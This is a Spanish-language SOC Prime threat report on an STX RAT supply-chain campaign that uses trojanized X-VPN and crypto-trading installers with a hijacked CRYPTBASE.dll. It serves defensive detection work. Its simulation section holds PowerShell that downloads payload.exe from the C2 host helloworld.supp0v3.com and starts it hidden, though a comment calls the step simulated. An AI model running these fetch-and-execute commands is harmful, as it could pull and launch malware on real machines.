SOC Prime Bias: Crítico

09 Jun 2026 12:31 UTC
newspaper icon cyderes.com

De Carteras Criptográficas a una VPN con 100 Millones de Usuarios: Dentro de una Campaña Activa de Cadena de Suministro del STX RAT

Author Photo
SOC Prime Team linkedin icon Seguir
De Carteras Criptográficas a una VPN con 100 Millones de Usuarios: Dentro de una Campaña Activa de Cadena de Suministro del STX RAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumen

Los investigadores descubrieron una campaña activa en la cadena de suministro en la que un actor de amenaza abusó de la carga de DLLs con una maliciosa CRYPTBASE.dll para desplegar el troyano de acceso remoto STX RAT a través de instaladores troyanizados para software de comercio de criptomonedas y el cliente X-VPN. La operación dependía de un único repositorio de Bitbucket para distribuir los paquetes infectados y rotar los dominios de comando y control bajo el supp0v3.com root. Al apuntar tanto a usuarios de herramientas de intercambio financiero como a un servicio VPN ampliamente utilizado, los atacantes se posicionaron para robar credenciales y otros datos sensibles a gran escala. El contenido de detección se actualizó para cubrir el método compartido de carga y la infraestructura común.

Investigación

Los analistas identificaron 11 paquetes maliciosos que todos utilizaron la misma CRYPTBASE.dll cadena de carga para cargar STX RAT directamente en la memoria. Los instaladores troyanizados estaban alojados en un repositorio de Bitbucket llamado amos-trading, y los metadatos de los commits vincularon la actividad al alias Leda Elacoate. Tras la exposición pública, los operadores rotaron la infraestructura de helloworld.supp0v3.com to welcome.supp0v3.com. El análisis de YARA confirmó que STX RAT fue la carga final en cada muestra examinada.

Mitigación

X-VPN abordó el problema en la versión de Windows 77.5.3, que aplica una carga estricta de DLLs desde directorios del sistema, realiza validación de hash de DLLs al inicio y aplica políticas de carga por proceso. Bloquear supp0v3.com y sus subdominios en el perímetro de la red puede interrumpir el tráfico de comando y control. Las organizaciones también deben reforzar la higiene de descarga de software y limitar las instalaciones a fuentes de proveedores verificadas.

Respuesta

Los defensores deben alertar sobre cualquier proceso que cargue CRYPTBASE.dll desde una ruta no del sistema e investigar signos de ejecución de STX RAT en memoria. La regla YARA publicada para STX RAT debe ser desplegada en las plataformas EDR, y el tráfico saliente HTTPS hacia supp0v3.com debe ser monitoreado de cerca. Todos los puntos finales deben ser actualizados a la versión parchada de X-VPN o tener el software vulnerable eliminado. La caza de amenazas también debe centrarse en el comportamiento de carga de código reflectante asociado con la cadena de desempacado en múltiples etapas del malware.

"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef malware fill:#ff9999 classDef file fill:#ccccff classDef operator fill:#ff9900 %% Node definitions tech_supply_chain["<b>Technique</b> – <b>T1195.002 Compromiso de la Cadena de Suministro: Compromiso en la Cadena de Suministro de Software</b><br/><b>Descripción</b>: el atacante inyectó una CRYPTBASE.dll maliciosa en instaladores legítimos alojados en un repositorio de Bitbucket."] class tech_supply_chain technique dll_cryptbase["<b>File</b> – <b>Nombre</b>: CRYPTBASE.dll (malicioso)"] class dll_cryptbase file file_installer["<b>File</b> – <b>Nombre</b>: Instalador Troyanizado (p. ej., Xu2011VPN, Binance, MEXC)"] class file_installer file tech_user_exec["<b>Technique</b> – <b>T1204.002 Ejecución de Usuario: Archivo Malicioso</b><br/><b>Descripción</b>: las víctimas descargan y ejecutan el instalador troyanizado."] class tech_user_exec technique tech_masquerade["<b>Technique</b> – <b>T1036.008 Disfraz: Tipo de Archivo Disfrazado</b><br/><b>Descripción</b>: el paquete malicioso se presenta como un instalador legítimo de VPN o de comercio de criptomonedas."] class tech_masquerade technique tech_dll_hijack["<b>Technique</b> – <b>T1574.001 Secuestro del Flujo de Ejecución: DLL</b><br/><b>Descripción</b>: el instalador carga CRYPTBASE.dll colocada en el directorio del programa, causando que la aplicación legítima cargue la DLL maliciosa."] class tech_dll_hijack technique tech_path_intercept["<b>Technique</b> – <b>T1574.008 Intercepción de Rutas: Secuestro del Orden de Búsqueda</b><br/><b>Descripción</b>: el orden de búsqueda de DLLs de Windows carga la DLL del atacante antes que la copia del sistema."] class tech_path_intercept technique tech_reflective["<b>Technique</b> – <b>T1620 Carga de Código Reflectante</b><br/><b>Descripción</b>: la DLL maliciosa desempaca e inyecta la carga STX RAT en la memoria usando carga reflectante, sin dejar artefactos en disco."] class tech_reflective technique tech_embedded["<b>Technique</b> – <b>T1027.009 Cargas Embebidas</b><br/><b>Descripción</b>: la DLL contiene una cadena de desempacado en varias etapas y el núcleo del STX RAT."] class tech_embedded technique malware_STX["<b>Malware</b> – <b>Nombre</b>: STX RAT<br/><b>Función</b>: troyano de acceso remoto que proporciona robo de credenciales y exfiltración de datos."] class malware_STX malware tech_c2["<b>Technique</b> – <b>T1071.001 Protocolo de Capas de Aplicación: Protocolos Web</b><br/><b>Descripción</b>: el RAT se comunica con C2 a través de HTTPS a subdominios de supp0v3.com."] class tech_c2 technique tech_cred_browser["<b>Technique</b> – <b>T1555.003 Credenciales de Navegadores Web</b><br/><b>Descripción</b>: STX RAT recoge credenciales de navegador guardadas, tokens de sesión y datos de cuenta del sistema."] class tech_cred_browser technique tech_exfil["<b>Technique</b> – <b>T1041 Exfiltración a través de Canal C2</b><br/><b>Descripción</b>: credenciales y datos del sistema recogidos son exfiltrados a través del mismo canal HTTPS C2."] class tech_exfil technique %% Connections tech_supply_chain –>|injeta| dll_cryptbase dll_cryptbase –>|colocada en| file_installer file_installer –>|descargado y ejecutado por la víctima| tech_user_exec tech_user_exec –>|conduce a| tech_masquerade tech_masquerade –>|habilita| tech_dll_hijack tech_dll_hijack –>|usa| tech_path_intercept tech_path_intercept –>|permite| tech_reflective tech_reflective –>|carga| malware_STX malware_STX –>|usa| tech_embedded malware_STX –>|se comunica a través de| tech_c2 malware_STX –>|recoge| tech_cred_browser tech_cred_browser –>|datos exfiltrados a través de| tech_exfil "

Flujo de Ataque

Ejecución de Simulación

Requisito Previo: El chequeo previo de telemetría y línea base debe haber pasado.

Fundamento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y pretenden generar la telemetría exacta esperada por la lógica de detección.

  • Narrativa del Ataque y Comandos:

    Un atacante que ha comprometido una cuenta de usuario de bajo privilegio utiliza una línea de comandos de PowerShell para descargar una carga maliciosa del servidor C2 helloworld.supp0v3.com. Esto aprovecha T1071.001 (Protocolo web C2) y T1204.002 (Ejecución de usuario) mientras que la propia carga está ofuscada (T1027, T1027.009) y disfrazada como un ejecutable legítimo (T1036.005/008). La conexión saliente al dominio malicioso debe ser capturada por el registro del firewall y, por lo tanto, activar la regla Sigma.

    # Descargar carga maliciosa del dominio C2 de Supp0v3
$url = "http://helloworld.supp0v3.com/payload.exe"
$out = "$env:TEMPpayload.exe"
Invoke-WebRequest -Uri $url -UseBasicParsing -OutFile $out

# Ejecutar la carga (simulada - en realidad solo crea un archivo ficticio)
Start-Process -FilePath $out -WindowStyle Hidden

  • Script de Prueba de Regresión:

    # TC-20260609-A1B2C - Simular conexión C2 de STX RAT a helloworld.supp0v3.com
try {
    # Paso 1: Preparar carga ficticia (evitar ejecución de malware real)
    $payloadPath = "$env:TEMPpayload.exe"
    Set-Content -Path $payloadPath -Value "Este es un ejecutable ficticio para prueba." -Encoding ASCII

    # Paso 2: Simular solicitud HTTP saliente al dominio malicioso
    $c2Url = "http://helloworld.supp0v3.com/payload.exe"
    Invoke-WebRequest -Uri $c2Url -UseBasicParsing -OutFile $payloadPath

    # Paso 3: "Ejecutar" la carga (sin ejecución real por seguridad)
    Write-Host "Ejecución simulada de la carga en $payloadPath"

    Write-Host "Simulación completada - verificar alerta en SIEM."
}
catch {
    Write-Error "Simulación fallida: $_"
}

  • Comandos de Limpieza:

    # Eliminar la carga ficticia y cualquier archivo residual
$payloadPath = "$env:TEMPpayload.exe"
if (Test-Path $payloadPath) {
    Remove-Item -Path $payloadPath -Force
    Write-Host "Archivo de carga limpiado."
}
else {
    Write-Host "No se encontró archivo de carga - nada que limpiar."
}

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis